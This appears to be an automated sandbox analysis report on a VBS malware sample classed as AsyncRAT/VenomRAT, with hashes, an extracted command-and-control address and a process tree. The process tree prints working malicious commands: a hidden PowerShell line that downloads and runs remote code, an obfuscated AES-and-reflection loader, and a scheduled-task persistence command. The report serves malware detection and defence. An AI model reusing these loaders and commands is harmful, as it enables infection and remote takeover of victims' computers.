Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-12-2024 02:09
Static task
static1
Behavioral task
behavioral1
Sample
051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320.vbs
Resource
win10v2004-20241007-en
General
-
Target
051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320.vbs
-
Size
91KB
-
MD5
7f67c01cf304afa0adf4c3095477ab07
-
SHA1
9c5e5e550e15b4e0e949591488ba72154e13378f
-
SHA256
051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320
-
SHA512
cbcf82588439f81719c5931b08176de77e3c7d08e22c084836ee3224dbbc6a96ebb4873cb2ac1d6d0225b6f7a8f8cef873fab3b54115e4cd8eb0ec1b623a7737
-
SSDEEP
1536:M8we4uQyXKFD5cFkWLcaxdYOyhGhRW9w+vcdlziIqzRNBHarEZ+2K:M8z4DOOW4eOFGhRW9wCIzi/8rE42K
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
core i9 OMEN
45.88.88.7:4164
nxafgjygny
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
resource yara_rule behavioral2/memory/3588-62-0x00000285F9930000-0x00000285F9948000-memory.dmp VenomRAT -
Venomrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/3588-62-0x00000285F9930000-0x00000285F9948000-memory.dmp family_asyncrat -
Blocklisted process makes network request 15 IoCs
flow pid Process 39 3588 powershell.exe 40 3588 powershell.exe 41 3588 powershell.exe 42 3588 powershell.exe 43 3588 powershell.exe 50 3588 powershell.exe 51 3588 powershell.exe 52 3588 powershell.exe 53 3588 powershell.exe 54 3588 powershell.exe 55 3588 powershell.exe 56 3588 powershell.exe 57 3588 powershell.exe 58 3588 powershell.exe 59 3588 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 208 powershell.exe 4684 powershell.exe 2304 powershell.exe 3588 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 208 powershell.exe 208 powershell.exe 4684 powershell.exe 4684 powershell.exe 2304 powershell.exe 2304 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 208 powershell.exe Token: SeDebugPrivilege 4684 powershell.exe Token: SeDebugPrivilege 2304 powershell.exe Token: SeIncreaseQuotaPrivilege 2304 powershell.exe Token: SeSecurityPrivilege 2304 powershell.exe Token: SeTakeOwnershipPrivilege 2304 powershell.exe Token: SeLoadDriverPrivilege 2304 powershell.exe Token: SeSystemProfilePrivilege 2304 powershell.exe Token: SeSystemtimePrivilege 2304 powershell.exe Token: SeProfSingleProcessPrivilege 2304 powershell.exe Token: SeIncBasePriorityPrivilege 2304 powershell.exe Token: SeCreatePagefilePrivilege 2304 powershell.exe Token: SeBackupPrivilege 2304 powershell.exe Token: SeRestorePrivilege 2304 powershell.exe Token: SeShutdownPrivilege 2304 powershell.exe Token: SeDebugPrivilege 2304 powershell.exe Token: SeSystemEnvironmentPrivilege 2304 powershell.exe Token: SeRemoteShutdownPrivilege 2304 powershell.exe Token: SeUndockPrivilege 2304 powershell.exe Token: SeManageVolumePrivilege 2304 powershell.exe Token: 33 2304 powershell.exe Token: 34 2304 powershell.exe Token: 35 2304 powershell.exe Token: 36 2304 powershell.exe Token: SeIncreaseQuotaPrivilege 2304 powershell.exe Token: SeSecurityPrivilege 2304 powershell.exe Token: SeTakeOwnershipPrivilege 2304 powershell.exe Token: SeLoadDriverPrivilege 2304 powershell.exe Token: SeSystemProfilePrivilege 2304 powershell.exe Token: SeSystemtimePrivilege 2304 powershell.exe Token: SeProfSingleProcessPrivilege 2304 powershell.exe Token: SeIncBasePriorityPrivilege 2304 powershell.exe Token: SeCreatePagefilePrivilege 2304 powershell.exe Token: SeBackupPrivilege 2304 powershell.exe Token: SeRestorePrivilege 2304 powershell.exe Token: SeShutdownPrivilege 2304 powershell.exe Token: SeDebugPrivilege 2304 powershell.exe Token: SeSystemEnvironmentPrivilege 2304 powershell.exe Token: SeRemoteShutdownPrivilege 2304 powershell.exe Token: SeUndockPrivilege 2304 powershell.exe Token: SeManageVolumePrivilege 2304 powershell.exe Token: 33 2304 powershell.exe Token: 34 2304 powershell.exe Token: 35 2304 powershell.exe Token: 36 2304 powershell.exe Token: SeIncreaseQuotaPrivilege 2304 powershell.exe Token: SeSecurityPrivilege 2304 powershell.exe Token: SeTakeOwnershipPrivilege 2304 powershell.exe Token: SeLoadDriverPrivilege 2304 powershell.exe Token: SeSystemProfilePrivilege 2304 powershell.exe Token: SeSystemtimePrivilege 2304 powershell.exe Token: SeProfSingleProcessPrivilege 2304 powershell.exe Token: SeIncBasePriorityPrivilege 2304 powershell.exe Token: SeCreatePagefilePrivilege 2304 powershell.exe Token: SeBackupPrivilege 2304 powershell.exe Token: SeRestorePrivilege 2304 powershell.exe Token: SeShutdownPrivilege 2304 powershell.exe Token: SeDebugPrivilege 2304 powershell.exe Token: SeSystemEnvironmentPrivilege 2304 powershell.exe Token: SeRemoteShutdownPrivilege 2304 powershell.exe Token: SeUndockPrivilege 2304 powershell.exe Token: SeManageVolumePrivilege 2304 powershell.exe Token: 33 2304 powershell.exe Token: 34 2304 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3588 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 1296 wrote to memory of 208 1296 WScript.exe 85 PID 1296 wrote to memory of 208 1296 WScript.exe 85 PID 1296 wrote to memory of 4088 1296 WScript.exe 103 PID 1296 wrote to memory of 4088 1296 WScript.exe 103 PID 4088 wrote to memory of 4684 4088 cmd.exe 106 PID 4088 wrote to memory of 4684 4088 cmd.exe 106 PID 4684 wrote to memory of 2304 4684 powershell.exe 107 PID 4684 wrote to memory of 2304 4684 powershell.exe 107 PID 4684 wrote to memory of 4992 4684 powershell.exe 110 PID 4684 wrote to memory of 4992 4684 powershell.exe 110 PID 4992 wrote to memory of 2136 4992 WScript.exe 111 PID 4992 wrote to memory of 2136 4992 WScript.exe 111 PID 2136 wrote to memory of 3588 2136 cmd.exe 113 PID 2136 wrote to memory of 3588 2136 cmd.exe 113
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('emte3ttqtxU8Z7uNtvShj79DDsvggmbvOto5AmNpef0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UMzwlReo+QuIcZAVBvu6GA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vpydZ=New-Object System.IO.MemoryStream(,$param_var); $whvQX=New-Object System.IO.MemoryStream; $NaCjv=New-Object System.IO.Compression.GZipStream($vpydZ, [IO.Compression.CompressionMode]::Decompress); $NaCjv.CopyTo($whvQX); $NaCjv.Dispose(); $vpydZ.Dispose(); $whvQX.Dispose(); $whvQX.ToArray();}function execute_function($param_var,$param2_var){ $JNCLx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MwOUn=$JNCLx.EntryPoint; $MwOUn.Invoke($null, $param2_var);}$toRQS = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $toRQS;$arTVC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($toRQS).Split([Environment]::NewLine);foreach ($ixRtZ in $arTVC) { if ($ixRtZ.StartsWith(':: ')) { $rZGXb=$ixRtZ.Substring(3); break; }}$payloads_var=[string[]]$rZGXb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_689_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_689.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_689.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_689.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('emte3ttqtxU8Z7uNtvShj79DDsvggmbvOto5AmNpef0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UMzwlReo+QuIcZAVBvu6GA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vpydZ=New-Object System.IO.MemoryStream(,$param_var); $whvQX=New-Object System.IO.MemoryStream; $NaCjv=New-Object System.IO.Compression.GZipStream($vpydZ, [IO.Compression.CompressionMode]::Decompress); $NaCjv.CopyTo($whvQX); $NaCjv.Dispose(); $vpydZ.Dispose(); $whvQX.Dispose(); $whvQX.ToArray();}function execute_function($param_var,$param2_var){ $JNCLx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MwOUn=$JNCLx.EntryPoint; $MwOUn.Invoke($null, $param2_var);}$toRQS = 'C:\Users\Admin\AppData\Roaming\startup_str_689.bat';$host.UI.RawUI.WindowTitle = $toRQS;$arTVC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($toRQS).Split([Environment]::NewLine);foreach ($ixRtZ in $arTVC) { if ($ixRtZ.StartsWith(':: ')) { $rZGXb=$ixRtZ.Substring(3); break; }}$payloads_var=[string[]]$rZGXb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3588
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5b66db53846de4860ca72a3e59b38c544
SHA12202dc88e9cddea92df4f4e8d83930efd98c9c5a
SHA256b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030
SHA51272eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527
-
Filesize
1KB
MD500ba539eb3a2e112abd37414b017593e
SHA1b465850f5857a5a8b4b411e1719924fe4c4dcdeb
SHA25637ad676fadc8f4c0c7537d3fb2f4dc801381efd42f6fb2c27b3d42610bbcc7c3
SHA5120c66a16344691c0ade62ea44fd828e3bd01c9c7e66296bdb9b3bdb0676046072d19f0aa92264e90c4c5ceb14499727952df6261df54b5234d1ba2c002bb073c7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
82KB
MD591521a30afc250ec301fbee04e3d72ec
SHA120c0d5e15643df6215f5052d70ad46d40da15fdd
SHA25687f7bfaaf8f6babc9af3cb2b5de96b6365016121332bd90b8905674acd4940c4
SHA512f9c61a01395eccccbb62ba2ce9cce4678da36b5a67a9712af98965c75cf126a740026bce576fe841b18ba018641842f845c007ad9e62dbde96b5cfd3b5299544
-
Filesize
115B
MD50e6ede580e40ab536c6e1795a2a667a0
SHA17b4044699b99190c7f7460e53d206b0ec78e8374
SHA2561c3af71e2a77d21f4f2b1707178e7f050f16e4bfb6ea81ee4628c8cab2f063c9
SHA5123344bda1317794f1b7ff31c71e471eadff0bdc351cb04b16991f853f75852cb672ac9417f0578d2fdc2f7a87d55861e03c08bd36d4c06a69b2a25e2d96eda7e6